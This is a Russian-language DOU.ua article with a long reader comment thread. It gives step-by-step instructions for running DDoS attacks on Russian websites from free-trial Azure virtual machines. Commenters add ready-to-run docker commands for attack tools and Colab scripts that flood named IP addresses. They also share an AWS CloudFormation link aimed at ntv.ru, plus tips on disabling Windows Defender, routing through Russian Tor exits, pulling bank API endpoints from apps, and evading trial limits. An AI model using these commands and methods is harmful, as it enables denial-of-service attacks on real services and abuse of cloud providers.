Как DDOSить российскую инфраструктуру с бесплатных виртуалок Azure

Підписуйтеся на Telegram-канал «DOU #tech», щоб не пропустити нові технічні статті.

Привет, меня зовут Игорь, я .NET разработчик из Харькова, столкнувшийся с той же проблемой, что и все мы. На нас напала страна-агрессор, и нам необходимо противостоять всеми доступными способами.

Сейчас вектор DDOS-атак весьма эффективен и востребован, так что решил контрибьютить в благое дело.

Так как с собой нет мощного железа, да и перегружать и так перегруженный украинский интернет не лучшая затея, я нашёл способ, как организовать DDOS без использования украинского интернета и собственного железа.

В инфраструктуре Azure канал обладает гораздо более высокой пропускной способностью, чем мобильный или даже хороший проводной интернет. Также мотивацией послужило то, что подобных виртуалок можно создать несколько, запустить и забыть про них.

Нашёл рабочий способ, делюсь с другими, чтобы вместе ещё больше масштабировать атаки. Уверен, существуют и другие cloud-провайдеры, с которыми можно провернуть нечто подобное. Выбрал Azure, т.к. наиболее знаком именно с ним.

Сразу учтите: нужен номер телефона и банковской карты, чтобы взять триалку, и для этого не подходят VOIP-номера. Кредитку нужно создать в банке, например, подойдет интернет-карта «Приватбанка».
Номер сим карты и кредитная карта должны быть «новыми» для ажура, т.е. не использованными ранее.

Update: UaShield создали bash скрипт, благодаря которому не нужно даже подключаться к виртуалке. Добавил описание как его использовать в пункт 11.2.

Порядок действий

1. Регистрируем новый email-ящик.

2. Идём на портал Azure, создаём новый аккаунт.

3. Вводим адрес почты, созданной на шаге 1. Придумываем хороший пароль (лучше использовать генератор).

4. Вводим код, пришедший на электронную почту.

5. Проходим капчу. Нужно выбрать животное, если не знаете какое — используйте гугл переводчик. В данном случае нужно выбрать сову.

6. Стартуем триалку.

7. Заполняем все поля. Нужно ввести номер телефона и нажать «Text me», после чего ввести номер пришедший в смс.

8. Заполняем поля с кредиткой. Ажур снимет 1$, а потом вернёт его обратно.

9. Мы получили 200$ на месяц на пользование ажуром.

10. Идём в Virtual Machines, создаём там новую.

11.1 Если не хотите сами конфигурить софт для аттак — используйте п. 11.2.
Создаём группу ресурсов,если её нет. Операционную систему выбираем Windows server (Win10 требует ключ лицензии). Если сможете развернуть на линукс — вибирайте его, он дешевле.
Вместо «Premium SSD» выбираем «Standart SSD»

11.2. В данном пункте описано как использовать bash скрипт от UaShield для того, чтобы не заходить на виртуалку вообще.

  • При создании виртуалки выбираем операционную систему Ubuntu Server
  • Во вкладкe «Advanced» находим текстовое поле «Custom Data»
  • Копируем скрипт с гитхаба UaShield и вставляем в поле «Custom Data»
  • Нажимаем Create.
  • Виртуалка создастся и запустится.На неё установится софт от UaShield, и автоматически начнёт аттаковать.
    Дальнейшая инструкция актуальна только для тех, кто хочет сам сконфигурить виртуалку. Если вы использовали скрипт из 11.2, вы уже всё сделали. Теперь можете создать ещё виртуалок, что-бы аттаковать эффективней.

12. У нас создалась виртуальная машина.

13. Если вы использовали скрипт из 11.2, то для вас инструкция далее не актуальна. Теперь по IP (в данном случае 123.123.123.123) подключаемся к RDP:

  • открываем Remote Desktop Connection (На рус Подключение к удалённому рабочему столу);
  • вводим IP виртуалки;
  • вводим юзер и пароль, которые мы указали при создании виртуалки.

14. Устанавливаем на виртуалку софт для атак, и запускаем его.
Из софта предлагаю только автоматизированные тулы, которым не нужно в ручном режиме задавать цели для аттак.

  • UaShield: Имеет встроенный прокси с огромным списком серверов, автоматически выбирает цели. Нужно просто запустить и забыть.
  • DisBalancerТоже автономен, нужно запустить и можно про него забыть. Без встроенного прокси, эффективней использовать с впн

Создайте 5 таких виртуалок на один аккаунт, они будут работать неделю, пока не закончатся триальные деньги.

Сподобалась стаття? Натискай «Подобається» внизу. Це допоможе автору виграти подарунок у програмі #ПишуНаDOU

👍ПодобаєтьсяСподобалось92
До обраногоВ обраному23
LinkedIn
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter

Чи є можливість подивитися якусь статистику в UASHIELD? Глянув в докер логах, там по всім ресурсам пише «DOWN OR BLOCKED». Схоже що щось не працює, може ВПН не запрацював

Мануал в одном месте. Вдруг кто ищет или не может разобраться

1. Регистрируемся в любом облачном сервисе, например, AWS EC2
2. Создаем вирутальную машину на Ubuntu
3. Вводим по очереди команды

1. DDOS with UASHIELD — github.com/opengs/uashield (UBUNTU)

sudo apt update
sudo apt install apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable"
sudo apt update
sudo apt-cache policy docker-ce
sudo apt install docker-ce

sudo docker pull ghcr.io/opengs/uashield:master
sudo docker run -d --name uashield ghcr.io/opengs/uashield:master 512 true

2. DDOS with 1000 needles — github.com/Arriven/db1000n (UBUNTU)

sudo apt update
sudo apt install apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable"
sudo apt update
sudo apt-cache policy docker-ce
sudo apt install docker-ce

sudo docker run -d --name db1000n --rm -it --pull always ghcr.io/arriven/db1000n

С помощью команды sudo docker container ls можно посмотреть активный docker контейнер
С помощью команды htop можно наблюдать активные процессы, загрузку процессора и памяти

Слава Украине!

Добрий вечір. Якщо на азурі перевищено ліміт по трафіку, чим це грозить? Може хтось підказати? Віртуалок вже немає, але трафік і затрати ростуть, причому трафік показує постійно різний, то більший, то менший

Нарахування за трафік і не тільки на azure йде з лагом, може бути 1-2 дні. Якщо це безкоштовний акаунт, то робити нічого не треба, він автоматично буде заблокований

Помогите советом. Сделал виртуалку на линуксе с bash скриптом от UaShield. Но через день вижу что трафик прекратился. Я просто перезапустил сервер. но трафика нет. Как его активировать?

Дякую за інструкцію! Створив, за допомогою скрипта, але дивлюся статистику і вихідний трафік показує близько нуля. Як перевірити що воно працює?

В мене проблема, підняв azure vm Ubuntu
Встановив xpressvpn, пробую конектитися і ніяк не получається, вічний меседж «connecting...» Одним словом не получається використати vpn на vm.
Можливо хтось підкаже, куди копати ? буду дуже вдячний, перечитав всі комменти, помітив, що в бекого точно такі проблеми були. На всякий випадок залишу посилання на тг t.me/Scamp68

То ли после обращения в техподдержку блокировку сняли
pastebin.com/raw/7Z70nkVu

То ли глючит сайт. Получилось так — Western Europe и если нажать средней кнопкой мыши в этом выпадающем списке размера машины то только так появляется список машин которые можно выбрать
imgur.com/a/cTzQbHp

Підкажіть, будь ласка, як зрозуміти, що скрипт працює?

не могу понять почему деньги не снимаются и почему больше 2х вм создать не могу?

ніхто не зустрічася з проблемою, що після вставки скрипта та натискання review + create, поряд з basic i network зявляються червоні хрести і сайт просто весить?

Було таке вчора ввечері, сьогодні спробував ще раз і все вийшло.

У меня такого не было, вчера все настроил, все работает.
С Линуксом все просто, с Виндовс ОС не было времени разобратся.

Було, треба спочатку заповнити вкладку

basic

а потім вставляти скрипт

Як знати що ще їсть ті 200 баксів а не записується інвойс тобі на потім? Бо перший день світились ті 200 баксів а потім просто зникли.

Коли заходиш на сайт порталу, то в правому верхньому куту з*являється вікно з поточною білінговою інформацією, залишок коштів і так далі. По ній можна і перейти і побачити всі витрати і залишок. Плюс там є також графік по якому можна зрозуміти день коли орієнтовно закінчаться 200$.

Друзі, то як можна налити впн на виртуалку, щоб залишився коннет через рдп?

Щоб подивитися чи все працює , якщо юзав скрипт , потрібно зайти в розділ моніторинг?
І чи потрібен для цього мій інет після того , як я створив віртуалку?

Данная деятельность безопасная для пользователей, так как можно выйти лично на каждого?

Супер! Скачал, собрал, запустил, оставил крутиться на заднем фоне. Слава Украине!

Існує, можливо побилося посилання ка конкретний реліз
github.com/opengs/uashield

Банк дает сделать 4 карты, после того как вы запустили ее можно удалить и создать новую с новыми реквизитами. Телефон можно использовать разовый (виртуальный смс) тоесть, по этой схеме можно запускать столько серверов, на сколько хватит терпения. Удачи, Слава Украине !!

Стосовно одноразових телефонів — Azure розуміє voіp номери та не дає на них рееструватися

Не voip а смс активатор, стоимость 1 рубл. За активацию (смс)

Підкажіть, чи можна з одної віртуалки клонувати інші

Що відбувається коли кредити закінчаться? Буде чардж з кредитки?

Краще використовувати інтернет картку, на якій буде всього 50 грн. Такі є майже у усіх банках

Перевірте посилання в статті не працює — github.com/...​opengs/uashield/releases
Я знайшов в коментарях і скачав тут — github.com/...​ield/releases/tag/v0.0.11

То посилання на усі резлізи, останній зараз 12, бери його github.com/...​ield/releases/tag/v0.0.12

А таке питання, при використанні тріал версії треба слідкувати за трафіком чи використаних потужностей, в кінці місяця не прийде рахунок який не обрадує ?)

я для найдійності зробив окрему карту (це 2 хв в будь якому інтернет банкінгу) і закинув туди 100 грн, для варифікації цього достатньо

Для ВЕРИФІКАЦІІ достатньо 38 гривень. Нащо 100?

Як зрозуміти, що я все зробив правильно і все працює?

Для варіанту із віндовою віртуалкою — подключитися та подивитися що софт працює.
Для варіанту із скриптом — можна подивитися моніторингом трафіку, що нагрузка є та вона динамічна. Дивися коментарі нижче

bitcoin-vps.com — якщо когось зупиняє необхідність вводу номера картки

Обов’язково вказувати номер телефону та номер картки?

Дивися комментар вище, якщо хочеш без номера картки то можеш заплатити у біткоінах якомусь хостингу.

Номер картки для того і потрібен, щоб одна людина не могла альюзити безкоштовні віртуалки у будь-якій кількості

Ігор, будь ласка,

Як зрозуміти, що я все зробив правильно і все працює?

Я налаштував машину по другому варіанту...

у меня не вышло и на новую карту с новым телефоном зарегать, все время выдает сообщение «You’re not eligible for an Azure free account» или «Looks like you already have an azure account»

Обов’язково вказувати мобільний телефон і номер картки?

нова павутина
Атакує певний перелік російських сайтів, який можна змінювати
Важливо! Не забувайте про увімкнений VPN, який потрібно час від часу
змінювати, або Tor Browser, у який потрібно час від часу перезаходити!
eu-people.github.io

Можна і на сервері запустити. На приклад у screen. firefox eu-people.github.io —headless

Spasibo za obnovlenie instrukcii. na ubuntu luchshe i mozhno dopolnitelno na docker skript zapuskat

Запустив UaShield 0.11, але здається він валить лише сайти ГосУслуги.
Вимкнув перемикач Проксі — на деякі запити приходить ECONNRESET, ECONNABORTED. На більшість приходить нормальна відповідь 200.
Якщо ввімкнути перемикач Проксі — ECONNRESET, ECONNABORTED приходить на всі запити.

Скажіть, що я роблю не так?

UPD: вже почали з’являтися 502, 503 коди у відповідях

там залежить від поточних цілей

да, вроде еще работает, хоум страница открывается

1. Як можна перевірити, що з віртуальної машини йде потрібний трафік при виконанні п11.2?
2. Як правильно підключитись по SSH з Ubuntu до VM?
3. Які команди можна виконати через інтерфейс azure, щоб перевірити успішність виконаних дій?

я все настроил по инструкции, запустип 5 виртуалок. мониторинг мониторится, деньги не снимаются ))) так и надо?)

Тільки підлючатися та дивитися, чи живий докер контейнер.

А трафік — дивитися поточну активність взагалі, по кількості передаваємих даних, або ставити якийсь аналог wireshark для лінукс та дивитися у ньому

На жаль, я чомусь не справився з підключенням по SSH, пробував через інтерфейс Azure встановлювати консольні програми для моніторингу трафіку — постійно якась помилка. Все, що знайшов — моніторинг вихідгого трафіку.
Чи відповідає очікуваному результату від віртуалки те, що на скріншоті?
i.imgur.com/qgENxDp.png

фаєрвол обов’язково треба налаштовувати, щоб був доступ до ssh порта віртуалки з вашого компа

Додайте до інструкції створення виконання скрипту автовстановлення uasheild github.com/...​ure-custom-data-script.sh
тоді взагалі на віртуалку заходити не треба, все автоматизовано

Див github.com/...​d/tree/master/tools/azure

Когда я подлключаю в удаленном рабочем столе Azure впн, то меняется IP удаленного компьютера, и соотвественно я теряю подключение с удаленным рабочим столом. Как решить эту проблему?

Можу запропонувати юзати OpenVpn, у группі дизбалансера хлопець роздає профайли безкоштовно. З опенвпн таких проблем нема

по самій тулзі, зара актуально db1000n

Внимание, чтоб максимально элементарно нагружать российские сайты на любом устройстве (на реальной или виртуальной машине), нужно просто открыть в браузере этот адрес (желательно через VPN) и нажать Run:

jsfiddle.net/3arvL8ce/show

— тут больше целей, чем на tours.testforstudio.com и stop-russian-desinformation.near.page, причесан внешний вид и оптимизирован скрипт (выдача статистики и таймауты будут меньше нагружать браузер, добавлены счетчик запросов и % ошибок, а также возможность перейти по ссылке и проверить, что это за сайт).

Можно посмотреть код скрипта или даже отредактировать страницу (синяя кнопка Edit), чтобы добавить новые урлы или менять нагрузку (при этом сгенерируется новый адрес этой страницы, который вы можете открывать параллельно оригинальной).

обновил опять, добавил еще свежих целей (из тг-группы IT Army), при этом убрал дубликаты и отсортировал по алфавиту:

jsfiddle.net/zqkL0cpb/show

Коллеги, прошу допомоги простим користувачам покласти сайти ворога. Максимально зможемо розповсюдити. Чекаю на рішення від спеціалістів. Ссилка через VPN (https://stop-russian-desinformation.near.page) вже не працює. Поки в старому вікні працює, якщо закрию — то пісець

вот новая ссылка (код скрипта можно посмотреть, если боитесь сразу запускать): jsfiddle.net/3arvL8ce/show — там больше целей и оптимизирован скрипт

можно просто нажать на «просмотр исходного кода» в браузере на этой странице, скопировать весь код который там видите и сохранить себе на комп, после этого когда откроете сохраненный файл он будет работать так же как раньше, не забывайте нужен ВПН!

А чому треба вибирати саме віндовс сервер на 2 цпу і 8 рам? Може краще десятку на 1 цп і 4 рам поставити? Буде дешевше, отже довше протягне. Головне це ж швидкість інтернету?

Десятка просить ключ ліцензії

уже наддосили. Смс гейт ліг. Смс для підтвердження аккаунту не приходять. ПРиїхали

Не получается пройти пункт 13.
Файл .rdp открываю на маке с помощью приложения Microsoft Remote Desktop, ввожу username и password.
Прилетает ошибка: The User Account Did Not Work.

Може не той пароль, або юзер? Або ви вимкнули просбос RDP порта. Повинно усе працювати

Маю таку ж проблему. Вам вдалось знайти рішення?

вводити потрібно саме user name (у прикладі вказано ukraine), а не пошту

як встановити софт на вірт машину?

Просто скачати та запустити ехе файл

можливо скористуйтеся більш простішим способом, потрібно буде лише скачати один файл. Якщо зацікавило то тут є іструкція trueukraine.tk

Як перевірити, що дали 200$ до тріала?

Хто знає як правильно запустити docker через vpn на віддаленому компі? Підняв інстанс на авс. Встановлюю там openvpn і після його запуску доступ до інстансу через ssh втрачається. чи є можливість запустити vpn тільки для docker, а не для цілого інстансу?

Мне друг советовал этот впн nordvpn.com
Первый раз, говорил он, получилось так же — отвалился инстанс, а второй раз — норм

В мене vpn від surfshark і спрацював сетап, який в docker-compose.yml описаний тут github.com/...​ilteoood/docker-surfshark

Дивимося таблицю маршрутизаціїї
ip addr show
Дивимось через строку з дефолт маршрутом, потім додаємо маршрут командою
sudo route add -net X.X.X.X netmask 255.255.255.255 gw Y.Y.Y.Y dev eth0
X.X.X.X — зовнішня адреса, звідки ви підключаєтесь
Y.Y.Y.Y — шлюз на вашому інстансі
eth0 — інтрерфейс через який йде трафік
Потім тільки включаємо VPN.

Кто знает почему 22 порт не может открыть на инстанс убунты, нажимаешь риквест акссес, появляется попап что все успешно, пытаешься залогиниться в консоли — не дает, пегергужаешь ажур портал появляется кнопка риквест акссес.И так уже раз 10.

дякую, за інструкцію!

Дуже поганий інтернет всередині вмки, що з цим робити ? Дізбалансер видає помилку при спробі законектитись до віддаленого серверу

Привіт, інтернет там суперовий. Проблема у тому, що з моменту написання статті бекенд дизбалансера помер.

Наразі існує інша программа, що в себі вже має проксі та сама підтягує список цілей.

Називається UaShield github.com/...​ield/releases/tag/v0.0.11

Я попробую відредагувати статтю щоб добавити посилання на цю програму

Стало видавати proxy 409. Що це значить? Заблокували proxy в программi?

409 то респонс код від сервера, взагалі він означає що при пут запиті появся конфлікт. У аутпуті буде багато помилок, головне — дивись щоб хоч інколи проскакували 200

Кисть способ проще и бесплатный. Через GitHub. Там есть встроенный docker. Вот полная инструкция. В принципе даже не специалист разберётся. Это конечно нарушает правила GitHub, но мы на войне. Лучше заводить новые аккаунты
docs.google.com/...​qPpB4XaQ9XeOUxdS5Dho/edit

Я неоднократно чув, що атакувати не з Росії чи Білорусі неефективно, так як просто такі айпішники не проходять, і потрібно бомбити через російський ВПН чи проксі. А чи дане рішення йде через російські айпішники, чи ні?

Якщо встановити впн з російським ip, то все працюватиме, по ідеї

увы, не подходят всякого рода Microsoft Azure, Google Cloud или Amazon. в логике таких крупных сервисов есть эвристические (поиск алгоритмов) и проактивные (слежение) методы отслеживающие исходящие DDoS атаки — после обнаружения аккаунт блокируется, атака прекращается.

есть подробный гайд как атаковать изнутри арендуя российские сервера bit.ly/barrierproject

Я ддошу вже дня 4, ще не заблокували

Heroku меня забанил (я там бесплатно поднимал докер-контейнеры), AWS меня тоже забанил (EC2 free tier тоже с докером). Azure не пробовал еще, но думаю тоже забанит...

Кто пробовал этот способ? На банят созданный сервер?

наразі вони закривають очі на це, але так, краще за все з росії вести атаку

Azure вже не проходить перевірку «людина» при створенні акаунту. Просто безкінечно запитує і запитує :(

«Нажимаем review + create». Нажимаю и пишет , что..... Проверка не пройдена. Необходимые сведения отсутствуют или недопустимы. Помогите плиз !!! Почта для связи [email protected]

Якщо не працює — або ажур закрив тріалку, або ви вже використовували цей мобільний або карту

Сталкивался с этой проблемой. Необходимо выбрать доступный регион.

Хлопці і дівчата, хтось знає як це зробити?

vk.com/...​et?w=wall-30558759_272177
3 марта 12:00 по Москве по этой ссылке пройдёт Всероссийский открытый урок.
Треба би їм гімн наш ввімкнути. Або відео анонімуса включити.
Це вже сьогодні! Часу обмаль!

Ребят кто то юзает свою карту банковскую, насколько безопасно?

Не очень безопасно, если страна, в которой будешь арендовать посчитает что ты нарушил закон

виртуальные создаешь в привате и все норм

Для этого нужно зарегистрироваться в приват24, а при регистрации просит карту...

Друзья, подскажите пожалуйста — можно ли где-то купить хостинг с поддержкой (точнее без проверок ) на spoof IP (подмена айпи) ? Да, такие вещи абсолютное большинство хостеров режут, но это очень хорошая вещь для кибервойны.

можна скористатися дешевшими інстансами, створити підрозділ — 29.55 USD/month за VM

Region: (Europe) Germany West Center
Image: Win Server 2019 Datacenter — Gen2
Size: > See all sizes — Standard_B2s

кто там координатор ?
кому можно подсыпать куда бомбить ?

скажіть, які порти треба відкрити на віртуалці, щоб дізбалансер підключився до синхронізуючого сервера?

Cannot register client. Server respond: Unable to connect to the remote server.
Started heartbeat process.
Error occured while Heartbeat ping was sent. Error: Unable to connect to the remote server.
І так по колу.

Це вони як почали оновлювати, так і не оновили :(

Існує ще одна ддос прога, тут у коментах запропонували, працює так же -
github.com/opengs/uashield/releases

В UaShield в мене постійно така відповідь | ECONNABORTED, це норм чи нічого не працює?

1) зміни ВПН і в програмі відключи проксі. 2) Подивись на ГітХабі чи не вийшов новий реліз.

outbound порти на азур віртуалках всі відкриті по дефолту. це тільки inbound закриті. це софт скоріше всього

открывать ничего не надо, кроме портов управление (SSH\RDP)

А как насчет ддосить ресурсы которые предоставляют апи от банков для мобильных устройств? Есть такие? или они закрыты? Может у кого-то есть список?

Можна просто виколупати адреси апішок з самого додатку. Для iOS достатньо Clutch + strings (unix дефолтні) + grep на джейлбрейкнутому девайсі зазвичай. Мало хто париться обфускацією.

те, кто хочет легко и просто атаковать важные российские сайты на любом устройстве, могут просто открыть этот адрес (желательно через VPN) и нажать Run:
jsfiddle.net/Lct3rpxg/show
— это те же страницы с адресами целевых сайтов и скриптом, часто опрашивающим эти сайты (tours.testforstudio.com и stop-russian-desinformation.near.page), но добавлены все URLs из обеих плюс еще порция, причесан внешний вид и оптимизирован чуть скрипт (выдача статистики и таймауты будут меньше нагружать браузер).
Там же можно редактировать страницу (синяя кнопка Edit) и добавлять новые урлы или менять таймауты.

Запустив jsfiddle і бачу через Fiddler Telerik, що відповідь 502 з усіх серверів цілей. Немає сенсу продовжувати, щось не те? Стучу з німецького айпі.

ну, по идее, это и есть признак успешной (пере)нагрузки, можно продолжать, чтоб сервера не успевали очухаться

Це точно? Чи це МОЖЕ означати, що сервер тебе просто відфутболює?

не точно, и ошибки приходят разные, надеемся, что пророссийские читатели их тоже получают вместо гадостного контента

а вообще, причины ошибки 502 такие:

Первая и основная причина ― перегрузка сервера. Перегрузка может быть вызвана несколькими проблемами:

1. Большое количество посетителей одновременно. Веб-ресурс может посещать ограниченное количество посетителей. Сколько человек может посетить сайт зависит от возможностей сервера (размера оперативной памяти) и настроек, которые сделал создатель ресурса. Если по какой-либо причине на сайт зайдёт больше пользователей, чем запланировано, сервис может не справиться и страница выдаст код 502. Такое случается при рекламных акциях и распродажах в интернет-магазинах.

2. Атака хакеров или DDoS-атака. Эта проблема связана с предыдущей причиной перегрузки. Хакер имитирует большой наплыв пользователей, из-за чего сервер выходит из строя. Такие атаки могут быть использованы для снижения продаж.

3...

вообще, для создания защищенного туннеля, по которому можно передавать непонятный никому извне трафик, но в данном случае чтобы: 1) пробиться сквозь возможную блокировку диапазонов ip (украинских, например), 2) не светить своим ip

обновил страницу для дэдоса, добавил больше целей, счетчик запросов и % ошибок. А также возможность перейти по атакуемой ссылке и проверить, что это за сайт. Ссылка:
jsfiddle.net/3arvL8ce/show

к чему указывать сервисы вида Яндекс, Мейл ру и т.д — их же невозможно и нет смысла валить

Каждый может помочь с DDoS российских ресурсов

Вы разработчик — помогите с улучшением и проверкой пулл реквестов
Вы PRщик — дайте знать о проекте большемц числу людей
Остальные — просто можете запустить программу и помочь с атаками на ресурсы РФ

github.com/opengs/uashield

В UaShield в мене постійно така відповідь | ECONNABORTED, це норм чи нічого не працює?

Ми зробили сервіс, що показує статус російських сайтів зі списку incourse.trade Може бути корисним тим, хто займається DOS атаками. Є моніторинг з різник точок світу, в тому числі з раши. Також є API для автоматизації. www.mordor-sites-status.info

Ми ще будемо працювати над вдосконаленням, зокрема, над додаванням всіх сайтів зі списку (зараз є обмеження на сто). Якщо є пропозиції і зауваження по сервісу пишить на [email protected].

Предлагали ещё ддосить Dns name серваки, но я рил хз как и ещё есть кеши у провайдеров. Хз насколько это поможет

А листи на електронну скриньку всім приходять?

Сорян, я вообще нуб в этом, как после создания машины подключить ее к атаке? Кто-то может помочь?

По суті ти створив ще один комп’ютер. Тепер ти запускаєш її, і через звичайний браузер в цьому «новоствореному» комп’ютері ти скачуєш все, що потрібно для атаки: чи Дізбалансер, котрий пропонується автором статті, чи через докер або що тобі більше до вподоби.

не хоче з віртуалки качати дизбалансер(

Дизбалансер так і не оновився, ось працююча прога
github.com/opengs/uashield/releases

Как считаете через гугл колаб есть смысл делать ддос атаки? Не могу найти такой инфы

Оказалось что без VPN это делать сейчас нет смысла — отрубают очень быстро, а VPN запустить в колабе нельзя

Мда. А давайте ще такий спосіб де треба скани паспорта щоб 100% нас всіх потім знайшли... Я в шоці від таких порад. Треба ж трохи думати про безпеку і анонімність.

у своєму офіційному каналі міністр цифрової трансформації України дав добра на будь-які способи кібер атак ціллю яких є окупанти

монобанк пропонує встановити віртуальну сімкарту

Ще ліпший спосіб деанонімізації :D так сім карта ні до чого не прив’язана, а через монобанк — прив’язана до банківського акаунта з усією персональною інформацією

Кто-то пробовал покупать VPS в ру регионе и запускать с него? Вот тут есть moscow регион

panel.op-net.com/onecloud

да, рабочая тема, только уже наверное все фри варианты прикрылись

Хтось може підказати, як на одному обліковому записі зробити тих п’ять віртуальних машин?
Я зробив дві, а більше не дає. В чому може бути причина?

у фришному акаунті є лімит на кількисть CPU сумарну яку ви юзаєте одночасно, на скільки я знаю

канал в телеге с инструкциями t.me/CyberSpace_UK

ufonet.03c8.net для тих хто з Linux дружить

Порада: ставте в Azure азіатський регіон створення інстансу. Росія дуже швидко блочить все з Європи/США, але з азією вона типу «дружить». Багато сайтів, що не відкриваються з Європи/США, все ще відкриваються з азіатських інстансів Azure.

Для тех у кого уже есть AWS аккаунт можно запустить атаку в пару кликов.

URL создаст виртуалку, установит софт и выберет цель — нужно нажать:
1) I acknowledge that AWS CloudFormation might create IAM resources.

2) Create stack

https://eu-west-1.console.aws.amazon.com/cloudformation/home?region=eu-west-1#/stacks/quickcreate?templateUrl=https://russkiy-voenniy-korabl-idi-nahuy.s3.eu-west-1.amazonaws.com/bomb_cfn.yml&stackName=bomb1&param_AmiID=%2Faws%2Fservice%2Fami-amazon-linux-latest%2Famzn2-ami-hvm-x86_64-gp2&param_Size=Micro&param_Target=https://ntv.ru%2F

Если будете запускать повторно нужно изменить CloudFormation Stack Name на к примеру bomb2. Изменить цель можно поправив поле Target.

Если кто-то захочет поднимать spot instances из autoscaling group — дам готовый ami

Дайте посилання на нормальний VPN,будь-ласка

Також можете відкрити colab.research.google.com створити та запустити такий скрипт:

sh = """
while true
do
  wget https://qrator.net/ru/
done
"""
with open('script.sh', 'w') as file:
  file.write(sh)

!bash script.sh

Ще один, більш дієвий варінт:

sh = """
git clone https://github.com/palahsu/DDoS-Ripper.git
cd DDoS-Ripper
python3 DRipper.py -s 135.181.20.68 -p 443
"""
with open('script.sh', 'w') as file:
  file.write(sh)

!bash script.sh

Я правильно розумію, що посилання на сайти для атаки скрипт бере з файлу script.sh? Чи можливо якимось чином вказати на який саме сайт проводити ddos атаку?

Файл створюється цим самим скриптом. Щоб атакувати інший сайт — просто вкажи його адресу замість 135.181.20.68.

Додам ще трохи, а то вкладка браузера падає через деякий час:

sh = """
git clone https://github.com/alexmon1989/russia_ddos.git
cd russia_ddos
pip install colorama
python3 DRipper.py -s 194.84.25.50 -p 80 -t 512 -m http
"""
with open('script.sh', 'w') as file:
  file.write(sh)

!bash script.sh

Немає такої сторінки

Переехало в комментарий к этой статье:

Для тех у кого уже есть AWS аккаунт можно запустить атаку в пару кликов.

Підкажіть, чи потрібно при цьому використовувати VPN і якщо так, то як саме встановити цей самий VPN?

Треба, бо все одно більшість сайтів просто почне блокувати країни або просто айпі з яких йде багато спаму і далі ви будете просто довбатися об стіну.

походу впн теж не дуже допомагає, бо я через впн штурмую sberbank. у мене сайт сбера не відкривається (зпід впна). а от россійські тули для перевірки доступності сайтів показують що збер онлайн. походу вони просто банять впновські IP пули.

Викорстовую DigitalOcean по такому ж принципу, дають $100 кедиту, найдешевша машина $5 в місяць

Для дудоса ще створили наші програмісти кібер їжака, користуйтесь cyber-yozh.com

Використовую AWS free tier. Створив EC2 інстанс, запустив docker run -ti —rm abagayev/stop-russia
. Перевірив, половину урлів зі списку точно мають доступ з Франкфурта.

Я теж роблю з ЕС2, але через нестачу скілів не можу налаштувати там впн. Ідеально ж буде з рос айпішніків атакувати. Можливо, проблема десь в сек’юріті групах, бо впн з’єднання просто не хоче підключатись. Використовую surfshark впн

eu-west-1.console.aws.amazon.com/...​am_Target=https://ntv.ru

выше в комментарии краткое описание — в двух словах это ссылка для разворачивания cloudformation template чтобы запустить инстанс с bombardier.

Перед rm 2 мінуси має бути — sudo docker run -ti --rm abagayev/stop-russia

К сожалению, при регистрации, пишет что мне не видать 200$ на шару, но могу воспользоваться azure оплатив, наверное отменили раздачу бесплатных плюшек?

Мужики помогите найти видео или статью как установить на компьютер lunix. Я на винде работаю не могу сделать ничего так как спалиться могу.

Можно прям из магазина приложений Майкрософта поднять
www.youtube.com/watch?v=La8jIAAANSA

О работает, спасибо

Можна не машину а scale set чи як там його.
Більше буде і свмозапускатиме нові

А наскільки ця діяльність ефективна для тих сайтів, які защицені сервісами ddos protection (наприклад, rt. com)?

В мене Disbalancer просто зависає

Уже не дает(( подключится к серверу DisBalancer

Мені коллега підказує що ніхріна не вийде бо там є «эвристика отслеживающая ддос исходящий.»

є можливість розчохлити через тг чому не підключає через rdc до ір з віртуалки? дисбалансер мій комп послав туди куди і корабель

rdc не підключає, disbalancer не хоче встановлювати, бачить як шкідливий файл. можна для чайника пояснити як пофіксити

Щоб дизбалансер запустився на вінді, треба відключити Windows Defender або добавити дизбалансер в виключення:
наприклад, на Windows Server 2019 це робиться в системних налаштуваннях: шукаємо Virus & threat protection -> Virus & threat protection settings -> Manage settings -> Exclusions -> Add an exclusion -> File

Що можна використовувати для macos? DisBalancer на неї не ставиться

Краще орендуй якусь сміттєву віртуалку у ноунейм хостера з Азії.
github.com/...​dos-attack-tools?l=python

Ще є таке для поціновувачів тераформу
github.com/...​utomation/azure-terraform

Супер, дякую!
Запустив десяток чи два контейнерів)
До речі, можна ще зробити акк для студентів.
azure.microsoft.com/en-us/free/students

1. Нужна русская прокся, многие их сервисы сейчас пропускают только русский траффик. Как это настроить на удаленной виртуалке?
2. С одного IP после Nного количества реквестов даже у самой примитивной защиты сработает ip ban. Нужен IP rotate ещё какой-то умный получается, или контроль над большим ботнетом. Что с этим делать? Это я ещё молчу про умные защиты типа cloudflare

сейчас пропускают только русский траффик.

Что намекает, что в ddos особого смысла нет. Там все самоизолируется и очистится.

защиты типа cloudflare

Скоро не будет.

Є якась інформація по cloudflare?

С надеждой на отключение облачной защиты мы все живём:)

Я тоже думаю, что статические ip будут быстро банить. Что если слать запросы скриптами через Tor браузер? Есть шанс, что конечный хост будет на территории России и может меняться, если получит бан.

отличная подсказка! спасибо.
добавил:
ExitNodes {ru},{by}  StrictNodes 1

теперь херачу прямо из москвы ))

У меня есть наработки по обходу защиты cloudflare, к сожалению ниодин из таргетов для ддосса не ползуется им.

Атаки ж будуть з ІР адреси десь у штатах чи США? Деякі ресурси в рашці (сбербанк наприклад) закриті зовні, відповідно для атак на них потрібно все одно ставити російський впн на віртуалці?

Якісь сайти мабуть, але усе що я знаю стирчить до всемирного інтернета.

Регіона «росия» у ажурі звістно нема))

Залишу це тут, може вам буде лінь робити віртуалку, а за бугром чи тут простоює машина:

Цитата:
Не забуваємо приймати участь у координованій DoS війні. Допомогти може кожен.

----
Особливо цінна допомога ваших родичів та знайомих з-за кордону.
----

Тримати один-два сайти на робочому комп’ютері відкритими, раз у годину закривати браузер і відкривати браузер знову.

stoprussia.net.ua
ban-dera.com
eitzen.at/fckptn

У списку є важливі пропагандонські сайти з «правдивими» новинами та API банківських сервісів.

